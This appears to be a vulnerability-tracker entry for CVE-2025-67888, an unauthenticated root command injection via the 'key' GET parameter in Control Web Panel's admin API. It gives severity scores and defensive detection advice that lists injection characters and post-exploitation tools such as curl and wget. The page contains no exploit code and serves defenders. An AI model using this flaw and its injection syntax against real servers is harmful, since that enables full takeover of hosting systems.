CVE-2025-67888
published 2026-05-08CVE-2025-67888: An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api"…
PriorityP260high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
EXPLOIT
EPSS
1.19%
64.0th percentile
An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present.
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP GET requests to /admin/index.php containing both the 'api' and 'key' parameters; the 'key' parameter value should be inspected for OS command injection characters (e.g., ;, |, $(), backticks, &&). ↗
- →Alert on unauthenticated requests (no valid session/auth headers) to /admin/index.php with both 'api' and 'key' GET parameters present, as exploitation does not require authentication. ↗
- →Exploitation typically requires Softaculous and/or SitePad to be installed; presence of these components on a CWP server increases risk and should be factored into prioritization of detection/patching. ↗
- →Flag any process spawned by the CWP web server process (e.g., Apache/Nginx running as root) that is a shell (sh, bash, etc.) or common post-exploitation binary (curl, wget, python, perl), as successful exploitation runs commands as root. ↗
- ·Exploitation requires Softaculous and/or SitePad to be installed via the CWP Scripts Manager. Instances without these components may not be exploitable. ↗
- ·Only CWP versions up to and including 0.9.8.1208 are vulnerable; version 0.9.8.1209 and later contain the fix. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2026-05-08
Published